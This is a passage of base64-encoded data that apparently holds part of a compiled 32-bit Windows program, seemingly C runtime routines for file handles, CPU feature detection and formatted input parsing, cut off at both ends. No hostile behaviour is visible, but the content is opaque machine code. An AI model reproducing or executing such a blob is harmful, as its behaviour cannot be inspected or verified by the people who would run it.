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+3H/fDAP8AAHU5D7bDUOh1iAAAipUH/f//WYuN9Pz//4XAdBP/hfD8//9rxgqNc9AD8OmCAAAAirUr/f//ioU3/f//g/tOD48IAQAAdGuD+yoPhPAAAACD+0Z0XYP7SXQTg/tMD4X7AAAA/saItSv9///rRQ+3RwKD+DZ1J2aDfwQ0dSCLjfT8//+DxwSDpej8//8AQYOl/Pz//wCJjfT8///rFYP4M3VtZoN/BDJ1ZoPHBIuN9Pz//4qdP/3//4q1K/3//4qFN/3//4TSD4Qp////ib0k/f//i70w/f//ibUs/f//i7XQ/P//hMAPhb4AAACLhcz8//+Jhcj8//+DwASJhcz8//+LQPyJhQD9///pogAAAGpkWWY7wXSVamlZZjvBdI1qb1lmO8F0hWp4WWY7wQ+Eef///2pYWWY7wXUj6Wz////+wIiFN/3//+ll////g/todEZqbFg72HQSg/t3dCf+woiVB/3//+lB////amyNRwJbZjkYdQeL+OkJ/////saItSv9//+KnT/9///+w4idP/3//+kg////ip0//f///s6ItSv9///+y+vjg6UA/f//ADL/hNt1GouFJP3//w+3AIP4U3QJg/hDdAT+w+sDgMv/i4Uk/f//aiAPtxBYC9BqbliJlRj9//870A+ELQEAAIP6Y3Qmg/p7dCH/tSD9//+NhRD9//9Q6Pv7//+LvRD9//9Zib0w/f//6xj/tSD9//9Hib0w/f//ib0Q/f//6OiBAABZD7fIuP//AACJjTj9//9mO8EPhKYDAACLlRj9//+LhfD8//+FwHQNg70s/f//AA+ELg8AAIC9N/3//wB1VIP6Y3QKg/pzdAWD+nt1RYuFyPz//4PABImFzPz//4tA/ImFAP3//4uFzPz//4mFyPz//4PABImFzPz//4tA/ImF2Pz//4P4AQ+C6g4AAIuF8Pz//4P6bw+PZwYAAA+ELQoAAIP6Yw+ECwUAAGpkWDvQD4QZCgAAD45xBgAAg/pnfkKD+ml0MGpuWDvQD4VcBgAAgL03/f//AIvHD4SXDQAAi504/f//6akEAACLjTj9///pKf///4v4ib0Y/f//6awHAACLnTj9//8z9motWWY7y3UMi4UI/f//RmaJCOsIaitYZjvDdSL/jSz9//9H/7Ug/f//ib0w/f//6KqAAAAPt9hZiZ04/f//g73w/P//AA+FiAAAAIONLP3////rfw+2w1Do54QAAFmFwHR9i40s/f//i8FJiY0s/f//hcB0aouNCP3///+F+Pz//2YPvsNmiQRxjYXU/P//UI2FQP3//0ZQjYUI/f//UI2F3Pz//1BW6HX5//+DxBSFwA+E/QEAAP+1IP3//0eJvTD9///oFYAAAA+32FmJnTj9///3wwD/AAAPhHX///+LhbT8//+LgIQAAACLQDAPtziLzw++wzvIi40s/f//D4XuAAAAi8FJiY0s/f//hcAPhN0AAAD/tSD9////hTD9///ouH8AAA+32IuFCP3//4mdOP3//2aJPHCNhdT8//9QjYVA/f//RlCNhQj9//9QjYXc/P//UFboxfj//4PEGIXAD4RNAQAAvwD/AACF33V8D7bDUOjLgwAAWYuNLP3//4XAdG6LwUmJjSz9//+FwHRhi4UI/f///4X4/P//ZokccI2F1Pz//1CNhUD9//9GUI2FCP3//1CNhdz8//9QVuhd+P//g8QUhcAPhOUAAAD/tSD9////hTD9///o/n4AAA+32FmJnTj9///rgIuNLP3//4O9+Pz//wAPhL4BAABqZVpmO9N0DGpFWGY7ww+FqgEAAIvBSYmNLP3//4XAD4SZAQAAi4UI/f//ZokUcI2F1Pz//1CNhUD9//9GUI2FCP3//1CNhdz8//9QVujQ9///g8QUhcB0XIu9MP3///+1IP3//0fodH4AAFlqLQ+32FmJnTj9//9mO8sPhZcAAACLhQj9//9miQxwjYXU/P//UI2FQP3//0ZQjYUI/f//UI2F3Pz//1BW6HT3//+DxBSFwHVvi7U4/f//M9uLhRT9//+DvcT8//8BdQdQ6B+J//9Zg73U/P//AXUM/7UI/f//6AqJ//9ZuP//AABmO8YPhewLAACLheD8//+FwA+F+QsAADiFPv3//w+F7QsAAIPI/+nlCwAAaitYZjvDD4WQAAAAi40s/f//i8FJiY0s/f//hcB1ZyGFLP3//+t1D7bDUOj9gQAAWYXAdHeLjSz9//+LwUmJjSz9//+FwHRki4UI/f///4X4/P//ZokccI2F1Pz//1CNhUD9//9GUI2FCP3//1CNhdz8//9QVuiP9v//g8QUhcAPhBf/////tSD9//9H6DV9AAAPt9hZiZ04/f//98MA/wAAdIPrBou9MP3///+1IP3//09Tib0w/f//ib0Q/f//6Nj2//+Dvfj8//8AWVkPhMn+//+AvTf9//8AD4WRAAAAi4UI/f//M8n/heD8//9miQxwi4Xc/P//jTxFAgAAAFfoG9j//4vwWYX2D4SM/v//jU//Uf+1CP3//1dWagDovoQAAIPEFIXAdBKD+BYPhNUKAACD+CIPhMwKAACLjQD9//+NhbT8//9QD76FK/3//1ZRSFD/NeDMBRD/FTxSAxD/0FbocIf//4PEFIu9MP3//4uFJP3//4qNPv3///7Bg8ACiI0+/f//iYUk/f//6VwJAACFwHUQ/4Us/f//x4Xw/P//AQAAAITbfgfGhR/9//8Bi4Uw/f///7Ug/f//i504/f//SIu1AP3//1OJhTD9//+JhRD9///ov/X//4u9GP3//1lZg/9jdAb/jdj8//+DvfD8//8AdBeLjSz9//+LwUmJjSz9//+FwA+ESgQAAIuFMP3///+1IP3//0CJhTD9//+JhRD9///omHsAAA+32Lj//wAAiZ04/f//WWY7ww+E8wMAAIP/Y3RPg/9zdRaD+wlyCYP7DQ+G2wMAAGogWGY72HU0g/97D4XKAwAAD7fDM9KLyEKD4QfB6APT4ouNFP3//w++DAgPvoXn/P//M8iF0Q+EnwMAAIC9N/3//wAPhYoDAACLjdj8//+FyQ+E3wgAAIC9H/3//wAPhCkDAACLlQD9//9miRqDwgJJiZUA/f//iY3Y/P//6RD///+LwoPocA+EugMAAIPoAw+Es/7//0hID4SwAwAAg+gDD4SBAQAAg+gDdDuLhST9//+LnTj9//9mORgPhWIIAACKjT79///+yYC9N/3//wAPhUn+//+Llcj8//+Jlcz8///pOP7//4TbfgfGhR/9//8Bi70k/f//g8cCal5YZjsHdQqDxwLGhef8////i4UU/f//hcB1I2gAIAAA6KHV//+JhRT9//9ZhcAPhC4IAADHhcT8//8BAAAAaAAgAAAz21NQ6JItAACDxAxqXVpmOxcPhbEAAACLhRT9//+L8oPHAsZACyDplwAAAA+3yIPHAmotWGY7wXVvZoX2dGoPtwdmO9B0YoPHAom9JP3//2Y78HMEi/jrCw+3/ovwibXQ/P//ib3s/P//Zjv3cy0rvdD8//8Pt9+LvRT9//8Pt/aL1ovOweoDg+EHsAHS4AgEOkZLdeuLvez8//8Pt8+L84u9JP3//+sCi/GL0bABg+EHweoD0uCLjRT9//9qXQgEClqJtdD8//8PtwdmO9APhVf///9mOR8PhPsGAACJvST9///pLP3//4u9GP3//2otWGY7wXUJxoUP/f//AesIaitYZjvBdRf/jSz9//8PhYYAAACDvfD8//8AdH23AYu1MP3//2owWGY7wQ+FLgIAAP+1IP3//0aJtTD9//+JtRD9///o4HgAAFkPt8hqeFiJjTj9//9mO8EPhJ0AAABqWFpmO9EPhJEAAADHhfj8//8BAAAAO/h0ToO98Pz//wB0Cv+NLP3//3UC/sdqb1qJlRj9///pzgEAAIu1MP3///+1IP3//0aJtTD9//+JtRD9///ocXgAAFkPt8iJjTj9///pXv///06JtTD9//+JtRD9//+LtSD9//9WUege8v//WVlqMFiLyIuVGP3//2p4iY04/f//WOlyAQAARom1MP3//4m1EP3//4u1IP3//1boFHgAAIO98Pz//wBZD7fIiY04/f//dBaLhSz9//+D6AKJhSz9//+D+AF9Av7HanhYi9CJlRj9///pIAEAAIOl7Pz//wCNhez8//9TUf+1AP3//1Do1zsAAIPEEIP4Ig+EggUAAIuF7Pz//4XAD47Q+///AYUA/f//KYXY/P//6b/7//+DxgLpt/v//4uFMP3///+1IP3//0hTiYUw/f//iYUQ/f//6ETx//9ZWYuFAP3//zvwD4Q0+f//gL03/f//AA+F9vr///+F4Pz//4P/Yw+E5/r//4C9H/3//wCLvTD9//90CjPJZokI6dT6///GAADpzPr//8aFK/3//wFqLVhmO8F1CcaFD/3//wHrCGorWGY7wXU9/40s/f//dQ2DvfD8//8AdAS3Aesoi7Ug/f//R1aJvTD9//+JvRD9///o03YAAFkPt8jpif7//4uVGP3//2p4WIu1IP3//4O99Pz//wAPhMwBAACE/w+FiwEAAIudMP3//zvQD4SLAAAAg/pwD4SCAAAA98EA/wAAD4VCAQAAD7bBUOjgegAAi70Y/f//WYXAD4RIAQAAam9YO/h1MIuNOP3//2o4WGY7wQ+GFwEAAIuF/Pz//4u16Pz//w+k8AOJhfz8///B5gPphgAAAIuV/Pz//2oAagpSi5Xo/P//UuhffgAAi404/f//i/CJlfz8///rX/fBAP8AAA+FwAAAAA+2wVDotHoAAFmFwA+EqAAAAIuF6Pz//4uN/Pz//4u1OP3//w+kwQRWweAEiY38/P//iYXo/P//6Gnv//+LvRj9//+Ltej8//9ZD7fIiY04/f///4X4/P//D7fBajBZK8GZA/CLhfz8//+Jtej8//8TwoO98Pz//wCJhfz8//90CP+NLP3//3Rvi7Ug/f//Q1aJnTD9//+JnRD9///oX3UAAIuVGP3//1kPt8hqeImNOP3//1jpp/7//4uNOP3//4u9GP3//0tWUYmdMP3//4mdEP3//+j97v//WVnrDouNOP3//+vgi70Y/f//i4X8/P//i7Xo/P//gL0P/f//AA+EVgEAAPfeagBbE8OJtej8///32ImF/Pz//+k+AQAAhP8PhRkBAACLnez8//+LtTD9//870HRMg/pwdEf3wQD/AAAPhdUAAAAPtsFQ6BZ5AACLvRj9//9Zi404/f//hcAPhL0AAABqb1g7+HURajhYZjvBD4aqAAAAweMD6z5r2wrrOffBAP8AAA+FjgAAAA+2wVDoJXkAAFmFwHR6i7U4/f//VsHjBOj67f//i70Y/f//WQ+3yImNOP3///+F+Pz//4PD0A+3wQPYg73w/P//AImd7Pz//3QI/40s/f//dGWLtTD9////tSD9//9GibUw/f//ibUQ/f//6AJ0AACLlRj9//9ZD7fIaniJjTj9//9Y6Rz///+LjTj9//+LvRj9////tSD9//9OUYm1MP3//4m1EP3//+ib7f//WVnrBou9GP3//4C9D/3//wB0DIuF7Pz///fYM9vrCDPbi4Xs/P//g+9G998b/yO9+Pz//w+EOwEAAIC9N/3//wCLvTD9//8PhW/y////heD8//+DvfT8//8AdByLhQD9//+Llej8//+JEIuV/Pz//4lQBOlE8v//io0r/f//i504/f//hMmLjQD9//90B4kB6dv2//9miQHp0/b//2Y70HUOjUECZjsQdQaJhST9//+LtSD9//9HVom9MP3//4m9EP3//+j8cgAAWYuNJP3//w+32ImdOP3//2aLAYPBAomNJP3//2Y7ww+FyQAAALj//wAAZjvDdSmLnST9//+LtTj9//9qJVlmOQsPhZH0//9qblhmOUMCD4WE9P//M9vrCDPbi7U4/f//i4Uk/f//D7cAZoXAD4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Ubi/H/hST+//+DpTz+//8Ag6VQ/v//AOlN////PDN1D41OAoA5MnUHi/HpOv///zxkD4Qy////PGl0eDxvD4Qm////PHgPhB7///88WHUn6RX///+KpXr+///+xIilev7//+kI////g/hodDuD+Gx0DIP4d3QY/sPp7P7//41GAYA4bHUHi/Dpd/////7HioV7/v///sCIhXv+//+KpXr+///pzv7//4qFe/7///7P/sjr44qFe/7//+vhg6VI/v//ADLJiI14/v//i41o/v//hMB1GIoBPFN0C8aFe/7///88Q3UHxoV7/v//AQ+2CYPJIImNWP7//4P5bnRhg/ljdCaD+Xt0If+1dP7//42FYP7//1Doyw4AAIu1YP7//1mJtXD+///rGP+1dP7//0aJtXD+//+JtWD+///o0/v//4vYiZ1c/v//WYP7/w+EFQ4AAIuNWP7//4qlev7//4uVOP7//4XSdAiF/w+E5A0AAITkdUiD+WN0CoP5c3QFg/l7dTmLhRT+//+DwASJhRT+//+LUPyDwASJhRj+//+JlUj+//+LQPyJhSz+//+D+AEPgiENAACLlTj+//+D+W8Pj+wFAAAPhBEJAACD+WMPhCoEAACD+WQPhP8IAAAPjvgFAACD+Wd+YYP5aXQ+g/luD4XlBQAAgL16/v//AIvGD4TsCwAAi71o/v//ioV5/v//i7Vw/v///sBHiIV5/v//ib1o/v//6YUMAABqZF+JvVj+//+D+y0PhdEGAADGhVb+//8B6coGAAAz9oP7LXULi4VE/v//RogY6wWD+yt1JP+1dP7//0+JvWz+//+LvXD+//9H6Jr6//+L2FmJnVz+///rBou9cP7//4O9OP7//wB1B4ONbP7///8PtsNQ6EltAABZi41s/v//hcB0aovBSYmNbP7//4XAdF2LhUT+////hUD+//+IHAaNhSj+//9QjYV8/v//RlCNhUT+//9QjYUg/v//UFbopvn//4PEFIXAD4RvDAAA/7V0/v//R+gP+v//i9gPtsNQiZ1c/v//6NdsAABZ64uLhfz9//+LgIQAAACLAIoAiIVX/v//OsMPheAAAACLwUmJjWz+//+FwA+EzwAAAP+1dP7//0fowPn//4uNRP7//4vYioVX/v//iZ1c/v//iAQOjYUo/v//UI2FfP7//0ZQjYVE/v//UI2FIP7//1BW6Ab5//+DxBiFwA+EzwsAAA+2w1DoS2wAAOtui41s/v//i8FJiY1s/v//hcB0YIuFRP7///+FQP7//4gcBo2FKP7//1CNhXz+//9GUI2FRP7//1CNhSD+//9QVuir+P//g8QUhcAPhHQLAAD/tXT+//9H6BT5//+L2A+2w1CJnVz+///o3GsAAFlZhcB1jYO9QP7//wAPhGMBAACD+2V0CYP7RQ+FVQEAAIuNbP7//4vBSYmNbP7//4XAD4Q+AQAAi4VE/v//xgQGZY2FKP7//1CNhXz+//9GUI2FRP7//1CNhSD+//9QVuge+P//g8QUhcAPhOcKAAD/tXT+//9H6If4//+L2ImdXP7//1mD+y11OYuFRP7//4gcBo2FKP7//1CNhXz+//9GUI2FRP7//1CNhSD+//9QVujN9///g8QUhcAPhJYKAADrBYP7K3Uwi41s/v//i8FJiY1s/v//hcB1CCGFbP7//+sV/7V0/v//R+gU+P//i9hZiZ1c/v//D7bDUOjbagAA626LjWz+//+LwUmJjWz+//+FwHRgi4VE/v///4VA/v//iBwGjYUo/v//UI2FfP7//0ZQjYVE/v//UI2FIP7//1BW6Dv3//+DxBSFwA+EBAoAAP+1dP7//0fopPf//4vYD7bDUImdXP7//+hsagAAWVmFwHWNT4m9cP7//4m9YP7//4P7/3QO/7V0/v//U+h5bwA